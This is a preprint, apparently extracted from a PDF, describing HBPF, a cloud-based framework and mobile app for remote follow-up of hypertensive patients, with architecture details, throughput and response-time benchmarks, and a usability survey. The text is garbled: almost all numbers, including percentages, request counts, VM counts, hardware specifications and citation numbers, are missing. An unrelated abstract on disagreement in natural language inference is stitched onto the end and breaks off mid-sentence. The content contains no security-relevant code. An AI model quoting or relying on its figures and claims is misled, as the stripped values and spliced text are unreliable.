view the peer-reviewed version (peerj.com/articles/cs- ), which is the preferred citable publication unless you specifically need to cite this preprint. cuadrado j, vilaplana j, mateo j, solsona f, solsona s, rius j, alves r, camafort m, torres g, betriu a, gutierrez jm, fernández e. . hbpf: a home blood pressure framework with sla guarantees to follow up hypertensive patients. peerj computer science :e https://doi.org/ . /peerj-cs. https://doi.org/ . /peerj-cs. https://doi.org/ . /peerj-cs. hbpf: a home blood pressure framework with sla guarantees to follow up hypertensive patients josep cuadrado, jordi vilaplana, jordi mateo, francesc solsona, sara solsona, josep rius, rui alves, miquel camafort hypertension or high blood pressure is a condition on the rise. not only does it affect the elderly but is also increasingly spreading to younger sectors of the population. treating it involves exhaustive monitoring of patients. a tool adapted to the particular requirements of hypertension can greatly facilitate monitoring and diagnosis. this paper presents hbpf, an efficient cloud-based home blood pressure framework. this allows hypertensive patients to communicate with their health-care centers, thus facilitating monitoring for both patients and clinicians. hbpf provides a complete, efficient, and cross-platform framework to follow up hypertensive patients with an sla guarantee. response time below one second for , requests and % increase in peak throughput going from one to virtual machines were obtained. in addition, a mobile app (bp) for android and ios with a user-friendly interface is also provided to facilitate following up hypertensive patients. among them, between % and % favorably evaluated the tool. bp can be downloaded for free from the website hesoft group repository (http://www.hesoftgroup.eu). peerj preprints | https://doi.org/ . /peerj.preprints. v | cc-by . open access | rec: may , publ: may hbpf: a home blood pressure framework with sla guarantees to follow up hypertensive patients josep cuadradoa, jordi vilaplanab, jordi mateob, francesc solsonaa,b, , sara solsonaa, josep riusb, rui alvesc, miquel camafortd ahesoft group, partida bovà, , e- , lleida, spain bdepartment of computer science & inspires, university of lleida. jaume ii , e- lleida, spain cdepartament of basic medical sciences & irblleida, university of lleida, avda. alcalde rovira roure , e- lleida, spain. ddept. of internal medicine, clinical institute for medicine and dermatology, hospital cĺınic, institute of biomedical research agust́ı pi i sunyer (idibaps), university of barcelona, hospital universitari villarroel , e- , barcelona, spain. abstract hypertension or high blood pressure is a condition on the rise. not only does it affect the elderly but is also increasingly spreading to younger sectors of the population. treating it involves exhaustive monitoring of patients. a tool adapted to the particular requirements of hypertension can greatly facilitate monitoring and diagnosis. this paper presents hbpf, an efficient cloud-based home blood pres- sure framework. this allows hypertensive patients to communicate with their health-care centers, thus facilitating monitoring for both patients and clinicians. hbpf provides a complete, efficient, and cross-platform frame- work to follow up hypertensive patients with an sla guarantee. response time below one second for requests and % increase in peak through- put going from one to three virtual machines were obtained. 
in addition, a mobile app (bp) for android and ios, with a user-friendly interface, is also provided to facilitate following up hypertensive patients. among them, be- tween % and % favorably evaluated the tool. bp can be downloaded for free from the website hesoft group repository (http://www.hesoftgroup.eu). email addresses: jcuadrado@hesoftgroup.eu (josep cuadrado), jordi@diei.udl.cat (jordi vilaplana), jmateo@diei.udl.cat (jordi mateo), francesc@diei.udl.cat (francesc solsona), sara@hesoftgroup.eu (sara solsona), jrius@diei.udl.cat (josep rius), ralves@cmb.udl.cat (rui alves), camafort@clinic.cat (miquel camafort) corresponding author . introduction hypertension is one of the most important risk factors in cardiovascular diseases, the leading cause of death worldwide [ ]. it affects about % of the adult population, a percentage that increases with age [ ]. home blood pressure (hbp) consists of patients taking readings at home and registering these using a digital device. the patients then send the readings to a health professional who is responsible for taking appropriate action [ ]. in a recent scientific article, the american heart association concluded that hbp monitoring should become a routine component of blood pressure measurement in the majority of patients with known or suspected hyperten- sion [ ]. hbp readings may also be better predictors of cardiovascular and renal outcomes than surgery readings [ , ]. furthermore, hbp readings provide a more accurate assessment of true blood pressure than alternative measurement methods, such as surgery blood pressure or rapid titration of antihypertensive therapy. they also avoid the white-coat syndrome and fa- cilitate the identification of masked hypertension, leading to a greater patient involvement in managing hypertension, a condition that is typically asymp- tomatic [ ]. having ways to monitor hbp in a continuous and rigorous way, with a fluid communication between patient and doctor may be crucial in ensuring satisfactory control of blood pressure, which is currently a great challenge. information and communication technology (ict) can play an important role in achieving this monitoring capabilities [ , ]. in this context, we developed and present hbpf (home blood pressure framework). hbpf is made up of two parts, the hm (hypertension module) server and the bp (blood pressure monitoring) mobile app. hbpf provides high performance for a given sla (service level agree- ment). an sla is a contract negotiated and agreed between a customer and a service provider for which a customer only pays for the resources and services used according to negotiated performance requirements at a given price [ , ]. throughput is one of the most important performance metric in a cloud-computing context [ , ]. it was also the performance parameter chosen in this work to fix the sla. frameworks such as hbpf generate large amounts of data that need to be continuously stored, processed, and available. this require the use of cloud computing services [ ]. earlier versions of the concept underlying hbpf [ , , ] were tested in a private cloud-based server, before mov- ing the hm into a real-world cloud environment. these applications used sms communications between clinicians and patients. this was limiting in many ways. the current platform uses internet communication, providing physicians with access to standard medical records and allowing them to write reports and to follow up and communicate (i.e. 
charting and sending videos) with patients by means of hbpf. efforts were made to design a scal- able framework when the number of both patients and hospitals increased by providing service level agreement (sla) guarantees [ , , , , ]. the remainder of the paper is organized as follows. section details the related work addressing the problem of tele-moritoring hypertensive patients. in section . , we present hm. section . is devoted to explaining the op- eration and functionality of the bp app. this app and its performance is evaluated in section . finally, section outlines the main conclusions and future work. . related work there is a potentially important role for novel techniques to lower er- rors in collecting blood pressure readings, especially in primary care, where management of hypertension mainly takes place [ , ]. one such techniques is mhealth - health care and public health practice supported by mobile devices [ ]. earlier work identified web sites that provided functionality to manage and present home blood-pressure readings. out of these, could be freely used. a comparison between these web sites was carried out between june and august [ ]. the results showed that none of these web sites were directly linked to common electronic medical records. in addition, none of them provided any tools for sending alert messages in any format. studies have shown the positive impact of mhealth on adherence-related behavior among patients. for example, short message service (sms) ap- pointment reminders have led to an increase in attendance of hiv [ ], tu- berculosis [ ], and quitting tobacco patients [ , ]. patient-physician short messaging through a telemedicine system was also tested as a means to improve control of hypertension in the follow-up of medium-to-low-risk patients in primary care [ ]. a control group (cg) recorded the data on paper and could only deliver it to their gp personally in routine visits. this study showed that % of the telemedicine-enabled patients strictly adhered to the treatment protocol, versus % in the cg. this suggests that more flexible and continuous ways of interaction and follow up of patients might have a greater impact in treatment adherence. a study among mhealth articles assessed the role of adherence of patients to chronic diseases management [ ]. . % ( / ) of studies used sms exclusively and . % used specialized software or a smartphone app. these programs focused mainly on a combination of devices, such as an electrocardiogram or a bp monitor. as a conclusion, the authors suggested that future mhealth tools need to provide optimal user-interfaces, or targeted motivational messages. with all this in mind, we designed and implemented hbpf to include a flexible and user friendly interface that provides motivational messages to the patients and enable immediate and real-time communication between patient and physician by means of the bp app. in addition, the app provides self- monitoring, reading sampling, charts, reports, tips, and advice, in line with other existing hypertension apps (see table , for a comparison of the main features between the various apps). however, with the exception of bp, none of the apps features on-line physician support for the patient, chat between physician and patient, or broadcasting communication among a group of patients. in addition, bp is the only app available for both, ios and android operating systems. 
app               dc    nc    charts   rh    ab    ap    os
bp lite           no    no    yes      yes   no    no    ios
ibp               no    no    yes      yes   no    no    ios
ibptouch          no    no    yes      yes   no    no    ios
bpmonitor         no    no    yes      yes   no    no    ios
bp                yes   yes   yes      yes   no    no    ios/android
icare bp monitor  no    no    yes      yes   no    yes   android
bp watch          no    no    yes      yes   no    no    android
finger bp prank   no    no    no       no    no    yes   android

table : comparison of bp with other similar hypertension apps. app: application name. dc: doctor chat (direct chatting with the physician). nc: nearby centers (provides information about the distance to specialized centers). charts: graphical evolution charts. rh: readings' history. ab: automatic sampling of the blood pressure by means of an external device. ap: automatic sampling of the pulse rate by means of an external device. os: operating system. app links: https://itunes.apple.com/us/app/blood-pressure-lite-bp-tracker/id ?mt= https://itunes.apple.com/us/app/ibp-blood-pressure/id ?mt= https://itunes.apple.com/kh/app/ibptouch-blood-pressure-tracking/id ?mt= https://itunes.apple.com/us/app/bpmonitor/id ?mt= http://www.hesoftgroup.eu/index.php?option=com_content&view=article&id= &itemid= https://play.google.com/store/apps/details?id=comm.cchong.bloodpressure https://play.google.com/store/apps/details?id=com.boxeelab.healthlete.bpwatch https://play.google.com/store/apps/details?id=com.galaxyfinger.fingerboodstar

hbpf provides a means to communicate across a wide range of platforms and devices with a doctor, as does healthtap (http://www.healthtap.com). in addition, hbpf provides a complete, efficient, and cross-platform framework to follow up hypertensive patients with an sla guarantee. furthermore, the transparent architecture of hbpf was designed to facilitate the involvement of additional third parties, and the integration with existing healthcare systems, while providing ad-hoc adaptation of monitoring parameters to each individual, in a similar way to [ ]. . hbpf fig. summarizes the overall operation of hbpf. first of all, patients send their readings with the bp app from a smartphone to the server ( ), via the internet ( ). figure : hbpf operation (bp app on the patient's mobile, internet, server, hm, database, clinician). on receiving a message, the server redirects it to the cloud-based hm. hm is responsible for checking and saving the readings in a database. clinicians can inspect the patients' readings from the database ( ). next, depending on the data and the criteria specified by the clinicians, hm responds to the patient's mobile with another message through the server ( and ). hm also provides additional facilities to follow up hypertensive patients. the main objective of the bp app is to extend the communication systems of the hm tool, adding the most widely used communication functionalities for smartphones. these include instant messaging (chat), among others. in this way, patients participate actively in controlling their disease and follow their medical evolution, communicating with the medical team in real time. . . hypertension module (hm) figure : hm. the names that appear in the figure are invented. the hypertension module (hm) (see fig. ) was designed for collecting and managing data from hypertensive patients. its functions are to record and print/display measurement statistics, show the evolution of patients graphically using charts, provide instant messaging tools (i.e. chat), aid clinicians with diagnosis, and generate alerts or suggestions for treatment, patient monitoring, medication and nutrition, among others.
one of the main features of hm is that it plots patients’ readings (systole and diastole blood pressures and pulse). these readings can be registered automatically by means of the bp app or manually by the clinicians. hm automatically calculates the mean values for each day, showing an overall average value per day in the plot. hm performs a data verification check, in order to avoid incorrect or invalid measurements, such as negative or physically implausible values. hm allows target limits from both systole and diastole blood pressures to be established individually depending on the characteristics of each patient. if these limits are exceeded, an alert is shown on the main page of the hm tool, so that clinicians can act quickly and, if needed, intervene or send an alert message to the patient. hm is currently designed to communicate with the patients through an internet connection (via a smartphone with the bp app). this somewhat determines the design of the architecture, currently made up of a server and a database (see fig. ). in order to increase the reliability and availability of the overall system, the server can contain multiple processing units, like processors, cores, or virtual machines. as the current web servers are usually mounted on cloud systems, “vms” is the terminology used from here on. an analysis of the performance provided by the server according to the number of vms is performed in the results section (sec. ). the clinician is responsible for registering the patient in the hm tool. once registration is done, the patient must send the blood pressure mea- sured at home through bp on a weekly or biweekly basis, depending on the requirements established by the doctor. this design feature facilitates future deployment of personalized medicine approaches to the treatment and follow up of hypertensive patients. according to the personalized monitoring plan of each patient, the system periodically reminds the patient to send their blood pressure readings. the system monitors that the data format and values it receives are appropriate, before recording them and sending a message to the bp app. the contents of the message depend on the information entered by the medical team and on the readings provided by the patients. . . . hm architecture the cloud-based architecture of hm scales easily with increasing number of patients, physicians, and hospitals. this is done by using the sla to adjust the number of available virtual machines (vms, widely used in cloud computing environments) and the number of requests entering the module (see [ , , , ] for more information). the current hm architecture is made up of hosts (nodes), each with one amd opteron processor of cores running at . ghz (see fig ). we plan to add more hosts as the system grows. note that nodes can be different, conforming a heterogeneous framework. all the software technolo- gies used to implement hbpf were carefully selected with several criteria in mind. first, they had to be open-source, in order to facilitate future shared development of the apps. in addition, these technologies had to be robust, efficient, and be widely deployed and supported. vms are deployed across the hosts on top of the openstack . openstack is an open source cloud plat- openstack. http://www.openstack.org form that allows to manage and deploy large networks of virtual machines. all the vms run ubuntu gnu/linux . . - -virtual x . 
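the verification, daily averaging, and alert behaviour described earlier in this section can be summarised in a few lines of code. the following python sketch is only an illustration of that logic, not the actual hm implementation: the field names, plausibility ranges, and per-patient target limits are assumptions made for the example.

from dataclasses import dataclass
from datetime import date
from statistics import mean
from typing import Dict, Iterable, Tuple

# illustrative plausibility ranges (mmHg / bpm); HM's actual thresholds are not published here
PLAUSIBLE: Dict[str, Tuple[float, float]] = {
    "systolic": (60, 260),
    "diastolic": (30, 160),
    "pulse": (25, 220),
}

@dataclass
class Reading:
    day: date
    systolic: float
    diastolic: float
    pulse: float

def is_plausible(r: Reading) -> bool:
    """Data verification: reject negative or physically implausible measurements."""
    return all(lo <= getattr(r, field) <= hi for field, (lo, hi) in PLAUSIBLE.items())

def daily_means(readings: Iterable[Reading]) -> Dict[date, Dict[str, float]]:
    """Average all valid readings taken on the same day (one plotted point per day)."""
    by_day: Dict[date, list] = {}
    for r in readings:
        if is_plausible(r):
            by_day.setdefault(r.day, []).append(r)
    return {
        d: {
            "systolic": mean(x.systolic for x in rs),
            "diastolic": mean(x.diastolic for x in rs),
            "pulse": mean(x.pulse for x in rs),
        }
        for d, rs in by_day.items()
    }

def needs_alert(day_mean: Dict[str, float], targets: Dict[str, float]) -> bool:
    """Raise an alert when a daily mean exceeds the patient's individual target limits."""
    return (day_mean["systolic"] > targets["systolic"]
            or day_mean["diastolic"] > targets["diastolic"])

# usage sketch with made-up readings and hypothetical per-patient limits
history = [
    Reading(date(2016, 3, 7), 152, 96, 70),
    Reading(date(2016, 3, 7), -10, 80, 65),   # discarded by the verification step
    Reading(date(2016, 3, 8), 128, 82, 68),
]
targets = {"systolic": 135, "diastolic": 85}
for day, means_ in sorted(daily_means(history).items()):
    print(day, means_, "ALERT" if needs_alert(means_, targets) else "ok")

in a deployment, checks of this kind would run server-side in hm before a reading is stored and before the response message is sent back to the bp app.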
we believe in a distributed design because the degree of administrative and geographic scalability increases with the number of hosts. figure : hm architecture (apache tomcat scheduler, computing vms, mysql cluster, two openstack hosts, firewall, ajp connections). the scheduler is mapped into a vm with mb ram and core in host . it is implemented using the scheduler of apache tomcat. the rest of the vms, which service the requesting tasks, are provided with gb and cores. these vms are the computing vm nodes, where the hm module copies (each performing the same operation) are deployed on top of apache tomcat, an open-source web server developed by the apache software foundation (asf). task scheduling determines which vm executes the tasks. vm consolidation instead determines the mapping of vms to hosts. the hm task scheduling and vm consolidation follow a round-robin policy, which states that tasks (vms) are assigned to vms (hosts) by following a circular ring ordering. all vms are configured with the ajp (apache jserv protocol - apache tomcat connector) protocol enabled, which is used by the scheduler to communicate with the nodes (apache tomcat: http://tomcat.apache.org/ ; http://httpd.apache.org/docs/ . /mod/mod_proxy_balancer.html ; http://tomcat.apache.org/connectors-doc/ajp/ajpv a.html). ajp is a protocol that can proxy inbound requests from a web server (apache http server) to an application server (tomcat). the database is implemented using a mysql cluster (https://www.mysql.com/products/cluster/), a technology that provides shared-nothing clustering and auto-sharding for the mysql database management system. the database is distributed between the hosts (nodes) making up the cloud framework. the mysql cluster is implemented with vms with gb ram and cores (of two different hosts). having multiple computing and data-sites ensures a high degree of load and administrative scalability and reliability. . . bp bp is designed to update and expand the current system of communication with the hm tool, offering an application that was not previously available for smart phones. bp is a user-friendly app that extends the hm services to android and ios smartphones. . . . bp design currently, there are many alternative technologies for developing applications for mobile devices. an important design requirement was that the application should be compatible with all the major platforms, android and ios. because of this, the bp app was implemented using html, css, javascript, jquery mobile and phonegap (http://phonegap.com). phonegap is an open-source development tool for creating cross-platform mobile applications with countless libraries available for use. phonegap has apis to control i/o devices efficiently (such as cameras, gps, databases, file system, etc.) in a similar way to those obtained with native code. phonegap currently supports the two mainstream platforms (android and ios). the features that retrieve information from hm need to establish a connection by means of web services. this ensures low data capacity requirements and avoids legal problems, as medical data is only stored in hm instead of in each individual smartphone. however, this introduces a low penalty in obtaining the required information remotely, although it does not significantly affect the user experience. we created ad hoc web services, which are used to exchange data in json format between the clients (bp instances) and the server (hm).
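as a concrete illustration of this json exchange, the sketch below builds a reading payload and posts it to the server. everything in it is hypothetical: the endpoint url, the field names, and the response shape are invented for the example, since the actual web-service schema of hm is not given in the text.

import json
from urllib import request

HM_ENDPOINT = "https://hm.example.org/api/readings"   # hypothetical URL, not the real HM service

def build_reading_payload(patient_id, systolic, diastolic, pulse, taken_at):
    """Serialise one home reading as the kind of JSON document exchanged between BP and HM.
    The field names are invented for illustration; the real schema is not published here."""
    return json.dumps({
        "patient_id": patient_id,
        "systolic": systolic,
        "diastolic": diastolic,
        "pulse": pulse,
        "taken_at": taken_at,          # ISO 8601 timestamp string
    }).encode("utf-8")

def send_reading(payload: bytes) -> dict:
    """POST the reading and return HM's JSON response (e.g. a status and an advice message)."""
    req = request.Request(HM_ENDPOINT, data=payload,
                          headers={"Content-Type": "application/json"})
    with request.urlopen(req) as resp:
        return json.load(resp)

# usage sketch (the network call is commented out because it needs a running server)
payload = build_reading_payload("patient-042", 152, 96, 70, "2016-03-07T08:30:00Z")
# print(send_reading(payload))   # assumed response shape: {"status": "yellow", "message": "..."}

keeping the payload to a handful of numeric fields matches the stated goal of low data-capacity requirements on the phone, with all medical data held only in hm.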
bp operation the bp app can be used to register patients, edit their profile, download or upload data regarding blood pressure and pulse readings from/to the hm server, visualize informative videos uploaded by the clinicians, analyze pa- tient trends by plotting and listing the evolution of the patients’ state and readings, and provide information about collaborating hospitals. finally bp can be used for chatting (instant messaging) between patients and clinicians. whenever required, a patient can easily ask the doctor a question through the chat window. the application also helps the patients with useful advice. once the blood pressures and the pulse have been sent, the app immediately shows the results of the analysis (done in hm) through a traffic light indicating the status of the patient. in addition, a short message indicates medical advice. the medical advice depends on the results of the analysis of the readings. there are three possible states (light colors) and three associated mes- sages: good (green). everything was fine. remember to keep measuring and sending your pressure readings. regular (yellow). do not forget, salt-free diet. remember to take the medication and do some physical activity. bad (red). we have seen your records, do not worry. we will contact you to bring your next clinical appointment forward. bp can show a graphic evolution of the patients’ measurements. different types of visualization can be chosen. by clicking global, the plot of the blood pressure (fig ) appears. the morning and afternoon buttons separate the samples by these times of day. start and finish dates can be selected. alternatively, , and months selectors are available. . results here we report a series of benchmark experiments used to evaluate the performance and efficiency of hbpf. we benchmark hm and the bp app separately and present the results in sections . and . respectively. the main performance criteria by which the hm server and the bp app should be evaluated are only partially overlapping. because of this we sep- arately evaluated the server and the app. for the hm server we evaluated figure : consultation readings for blood pressure. response time, throughput, and scalability. for the bp app, we evaluated startup time, communication time and usability. . . hm . . . testbed experiments on the hm tool were carried out on virtual machines [v m . . . v m ] deployed over openstack, installed on a host with amd opteron processor with cores running at . ghz each. to emulate vm heterogeneity, we set v m . . . v m with gb ram and cores. application stress tests via http requests were performed using the apache jmeter tool, which measures performance and functional behavior. these requests simulated patients consulting or introducing their data and clinicians using hm. the effect of number of simultaneous requests on hbpf performance was tested by systematically varying the number of users. there were generated requests per user. all users would be performing their requests within a single sec. period. the time between user requests was constant and therefore these requests were uniformly distributed in the second test interval. jmeter. http://jmeter.apache.org/ the performance metric we used was the response time and through- put, as these parameters are widely used for measuring system efficiency. throughput was also the parameter chosen to fix the sla. . . . response time testing the response time of the application was done using all five avail- able vms. fig. 
summarizes the response time of the system in terms of the median, average and % line when the number of users increased from to . the % line (or th percentile) is the value below which % of the samples were processed in less than the time specified on the y-axis. this metric is more meaningful than the median or average value in terms of the sla (service level agreement). although the system starts to overload at , requests (i.e. users), the average and median response time still remain below one second (so users will not notice a lack of interactivity with the system). naturally, worse results were obtained for the % line ( , s). figure : evolution of response time (average, median and % line); y-axis: time (ms), x-axis: number of requests (thousands). . . . throughput another measure of efficiency is throughput (tr), defined as the number of requests served per unit of time: tr = (number of requests) / (elapsed time). here, we benchmark the effect of changing the number of available vms on the tr, with the number of users varying from to . fig. compares the tr of the system when we use one (vm ), three (vm -vm ), or five vms (vm -vm ). figure : evolution of system throughput when using one, three, and five vms; y-axis: throughput, x-axis: number of requests (thousands). fig. summarizes the results. a general feature of the system's response is that tr increases linearly with the number of requests, until it peaks at approximately , requests ( , for vm). after this threshold, tr performance decreases slightly and the sla is not guaranteed. we note that the sla should be fixed according to the required tr, depending on the number of requests and the number of vms available. this behaviour is consistent with previous simulations of a similar model system, using an approach based on queuing theory [ , ]. going from one to three vms leads to an increase in peak tr of , %. in contrast, going from three to five vms leads to an increase in peak tr of approximately , %. this suggests that the peak relative performance increment decreases every time additional vms are activated. internal tests suggest that this loss was due to the delay introduced by the remote communication between vms located in different cores, which is a known frequent bottleneck in distributed computing applications. thus, as was the case in the simulated system [ , ], we face a situation where our system overloads, leading to a significant increase in the response time and a decrease in tr. however, in contrast with the simulated system, adding more vms to the real hbpf system only partially solves the problem, and a law of diminishing returns is observed as the number of vms increases. overall, these experiments suggest that the most efficient strategy for distributing work between the vms allocated to hbpf is to first deploy work to local vms; when these are saturated, work should then be sent to remote vms. . . . scalability we also investigated the scalability of the system in its cloud environment by using an event-driven simulator to test the behaviour of that environment. we use the cloudsim . . software [ ] in these tests because it allowed us to easily emulate the hbpf architecture presented and evaluated in sections . . and . respectively. cloudsim allows the behaviour of the amd opteron , (the one chosen for this simulation) to be emulated. the cloudsim task scheduling and vm consolidation followed a round-robin policy. as we chose the same processor and scheduling policies as the hm architecture (see section . .
), the results obtained in the simulation should be directly applicable to the real system. fig. shows the system behavior when scaling it by increasing the num- ber of vms and hosts. vms were made up of cores and gb each. as in section . , one host was made up of one processor. the simulation en- vironment was carried out by executing , tasks with a size of , instructions each. further experiments varying these parameters gave pro- portional results. hosts vm figure : execution times depending on the number of vms and the number of hosts. we can appreciate that increasing the number of vms and hosts signifi- cantly decreases the total execution time (in time units) of the overall tasks. fig. shows that by adding vms, the performance approaches asymptoti- cally to a limit where it does not have enough computational resources (ram, cpus, etc.. making up the hosts) to map the tasks, and so the execution time stabilizes. similar behavior occurs when adding more hosts without adding more vms. . . bp . . . performance typically, two important bottlenecks in application performance are the start up of the app and the operational processes in which that app accesses internet. bp was installed and tested on smartphones and tablets running modern versions of android and ios. the devices and operating systems used to verify the correct operation of bp are listed in table . this table shows the elapsed time of the start up for bp. these times were the average of independent measurements. device operating system bp start up time samsung galaxy s android v. . . . samsung galaxy s android v. . . nexus android v. . . . ipad ios v. . . iphone ios v. . . table : performance comparison between devices (in ms). the cross-reference apis used by phonegap introduced a considerable penalisation in the bp start up time ( ms). however, the application performed well in all the tested devices. in all cases, overall response time fell below one second, which guarantees that the user’s flow of thought is uninterrupted [ ]. the communication time sending a chat message to hm was also mea- sured. to do so, we computed the average time for all android and ios devices. we tested two types of connections, wifi (with mb/s download and mb/s upload speed) and g data internet. each experiment was repeated times per device. communications were very fast, taking on average ms for wifi and ms for g. wifi bandwidth was entirely dedicated to communications done using the bp app. this validates the design of the communication mechanism between the app and hm. . . . usability here we perform a preliminary evaluation of bp’s usability. this was done by asking both, clinicians and patients, to fill in a google-forms questionnaire. this questionnaire was sent by the hm server to all registered patients and the clinicians of the clinic hospital of barcelona. patients and all the clinicians answered it. table summarizes the results of this evaluation. this table only shows the affirmative answers. clinicians are highly satisfied with the app and all are convinced of its usefulness and efficiency. in addition, they don’t find its use monotonous. in addition, two of the three clinicians found bp very easy to use. we note that these evaluations are anecdotal and a larger number of clinicians must answer the survey before we can come to a reasonable conclusion about usability of bp from the clinician’s point of view. in terms of user evaluation, we focus more on the feedback from patients than that from clinicians for two reasons. 
first, patients will be the vast majority of final bp users. second, we need to obtain input from additional clinicians, given the low number of professionals that answered the survey. between % and % of all patients reported full satisfaction with the various aspects of using the bp app, indicating that they are mostly happy with the application. the weakest point we detected was that % of the patients found the use of bp monotonous. this is in striking difference with the clinicians that had the opposite opinion. we need to further and specifically understand what the patients found boring in order to improve that aspect of the app. in general, clinicians and patients recognized the usefulness of the app for remote monitoring of hypertensive patients and to reduce traveling costs. we note that we are now in the process of compiling patient and clinician suggestions to help us improve the user-friendliness of the app. . conclusions this article presents hbpf, an efficient ehealth framework to manage and follow up hypertensive patients. hbpf comes with with sla guarantees and it can significantly reduce the costs associated with patient travelling. its efficiency and sla guarantees are provided by hm, the hbpf server component. question patients clinicians would you recommend it? it is useful for monitoring hypertension? is it use monotonous? is it easy to use? . is it useful to reduce the visits to the hospital? table : evaluating the use of bp. affirmative answers (in %). the use of phonegap when implementing bp was a successful decision because it has proven to be a very suitable framework for cross-platform applications, increasing its flexibility and functionality. we tested its perfor- mance in the ios and android operating systems on both smartphones and tablets. despite the difficulties of adapting the interface in some cases, the results achieved were satisfactory. however, the user experience could possibly be improved by using native development due to the fact that phonegap has a slightly higher response time than native applications. accordingly, we are migrating the current ap- plication to native environments for ios and android platforms. we expect to improve this aspect, which we assume will be temporary. we will then compare the performance of phonegap against native frameworks. future trends are aimed at testing how the use of this comprehensive and personalized monitoring tool can minimize the risk of heart attacks, strokes and other effects of hypertension. we plan to add a wireless or bluetooth interface to the sampling device without requiring the patient to manually submit the data, thus facilitating automatic data transfer and avoiding tran- scription errors. moreover, we plan to implement data analytics so we can provide aggregated data to the clinicians in order to detect trends and pat- terns within their patient groups. references [ ] r craig, j mindell, eds. health survey for england . london: her majesty’s stationery office. . [ ] hypertension in the very old; prevalence, awareness, treatment and con- trol: a cross-sectional population-based study in a spanish municipality. http://www.biomedcentral.com/ - / / . [ ] pickering tg, miller nh, ogedegbe g, krakoff lr, artinian nt, goff d, american heart association, american society of hypertension, pre- ventive cardiovascular nurses association. 
call to action on use and re- imbursement for home blood pressure monitoring: a joint scientific state- ment from the american heart association, american society of hyper- tension, and preventive cardiovascular nurses association. j cardiovasc nurs, ( ): - . . [ ] ohkubo t, imai y, tsuji i, nagai k, kato j, kikuchi n, nishiyama a, aihara a, sekino m, kikuya m, ito s, satoh h, hisamichi s. home blood pressure measurement has a stronger predictive power for mortality than does screening blood pressure measurement: a population-based observation in ohasama, japan. j hypertens, ( ): - . . [ ] bobrie g, chatellier g, genes n, clerson p, vaur l, vaisse b, menard j, mallion jm. cardiovascular prognosis of masked hypertension detected by blood pressure self-measurement in elderly treated hypertensive pa- tients. jama, ( ): - . . [ ] mcmanus rj, mant j, bray ep, holder r, jones mi, greenfield s, kaambwa b, banting m, bryan s, little p, williams b, hobbs fd. tele- monitoring and self-management in the control of hypertension (tas- minh ): a randomised controlled trial. the lancet, ( ): - . . [ ] green bb, cook aj, ralston jd, fishman pa, catz sl, carlson j, carrell d, tyll l, larson eb, thompson rs. effectiveness of home blood pressure monitoring, web communication, and pharmacist care on hypertension control: a randomized controlled trial. jama, ( ): - . . [ ] vilaplana j, solsona f, abella f, cuadrado j, teixidó i, mateo j, rius j. h-pc: a cloud computing tool for supervising hypertensive patients. journal of supercomputing, ( ): - . . [ ] law mr, morris jk, wald nj. use of blood pressure lowering drugs in the prevention of cardiovascular disease: meta-analysis of randomised tri- als in the context of expectations from prospective epidemiological stud- ies. bmj, :b . . [ ] dickinson ho, mason jm, nicolson dj, campbell f, beyer fr, cook jv, williams b, ford ga. lifestyle interventions to reduce raised blood pressure: a systematic review of randomized controlled trials. j hyper- tens, - . . [ ] vilaplana j, solsona f, abella f, cuadrado j, alves r, mateo j. s-pc: an e-treatment application for management of smoke-quitting patients. computer methods and programs in biomedicine, ( ): - . . [ ] abbas a, khan su. a review on the state-of-the-art privacy- preserving approaches in the e-health clouds. journal of biomedical and health informatics, ( ): - . . [ ] vilaplana j, solsona f, abella f, cuadrado j, teixidó i, mateo j, rius j. h-pc: a cloud computing tool for supervising hypertensive patients. the journal of supercomputing, ( ): - . . [ ] mateo j, vilaplana j, pla lm, lerida jl, solsona f. a green strat- egy for federated and heterogeneous clouds with communicating work- loads. the scientific world journal, : - . . [ ] vilaplana j, solsona f, abella f, filgueira r, rius j. the cloud paradigm applied to e-health. bmc medical informatics and de- cision making, vol ( ): - . http://www.biomedcentral.com/ - / / . . [ ] vilaplana j, solsona f, teixidó i, mateo j, abella f, rius j. a queuing theory model for cloud computing. journal of supercomputing, ( ): - . . [ ] vilaplana j, solsona f, mateo j, teixido i. sla-aware load balancing in a web-based cloud system over openstack. lecture notes in com- puter science, : - . . [ ] lai cc, lee rg, hsiao cc, liu hs, chen cc. a h-qos-demand per- sonalized home physiological monitoring system over a wireless multi-hop relay network for mobile home healthcare. journal of network and com- puter applications, ( ): - . . [ ] world health organization. 
second global survey on ehealth (global observatory for ehealth). geneva: world health organization; . mhealth: new horizons for health through mobile technologies url: http://www.who.int/goe/publications/goe mhealth web.pdf. ac- cessed - - . [ ] patel b, turban s, anderson c, charleston j, miller e, appel l. a com- parison of web sites used to manage and present home blood pressure readings. j clin hypertens, : - . . [ ] bigna jjr, noubiap jjn, kouanfack c, plottel cs, koulla-shiro s. effect of mobile phone reminders on follow-up medical care of children exposed to or infected with hiv in cameroon (more care): a mul- ticentre, single-blind, factorial, randomised controlled trial. the lancet infectious diseases, ( ): - . . [ ] liu q, abba k, alejandria mm, sinclair d, balanag vm, lansang ma. reminder systems to improve patient adherence to tuberculosis clinic appointments for diagnosis and treatment. cochrane database syst rev, ( ):cd . . [ ] carrasco mp, salvador ch, sagredo pg, márquez-montes j, gonzález de mingo ma, fragua ja, rodŕıguez mc, garćıa-olmos lm, garcia- lópez f, carrero am, monteagudo jl. impact of patient-general practi- tioner short-messages-based interaction on the control of hypertension in a follow-up service for low-to-medium risk hypertensive patients: a ran- domized controlled trial. ieee trans inf technol biomed, ( ): - . . [ ] hamine s, gerth-guyette e, faulx d, green bb, ginsburg as. impact of mhealth chronic disease management on treatment adherence and patient outcomes: a systematic review. j med internet res, ( ):e . . [ ] benharref a, serhani ma. novel cloud and soa-based framework for e-health monitoring using wireless biosensors. biomedical and health informatics, ieee journal of ( ): - . . [ ] calheiros r, ranjan r, beloglazov a, de rose c, buyya r. cloudsim: a toolkit for modeling and simulation of cloud computing environ- ments and evaluation of resource provisioning algorithms. software: practice and experience, ( ): - . . [ ] miller rb. response time in man-computer conversational transactions. proc. afips fall joint computer conference, : - . . figure (on next page) hbpf operation mobile clinician internet blood pressure pa ent database server hm bpcontrol hm. the names that appear in the figure are invented figure (on next page) hm architecture apache scheduleer mysql cluster vm vm vm vm vm vm host host openstack openstack task firewall ajp consultation readings response time throughput scalability inherent disagreements in human textual inferences ellie pavlick brown university ellie pavlick@brown.edu tom kwiatkowski google research tomkwiat@google.com abstract we analyze human’s disagreements about the validity of natural language inferences. we show that, very often, disagreements are not dismissible as annotation ‘‘noise’’, but rather persist as we collect more ratings and as we vary the amount of context provided to raters. we further show that the type of uncertainty captured by current state-of-the-art models for natural language inference is not reflective of the type of uncertainty 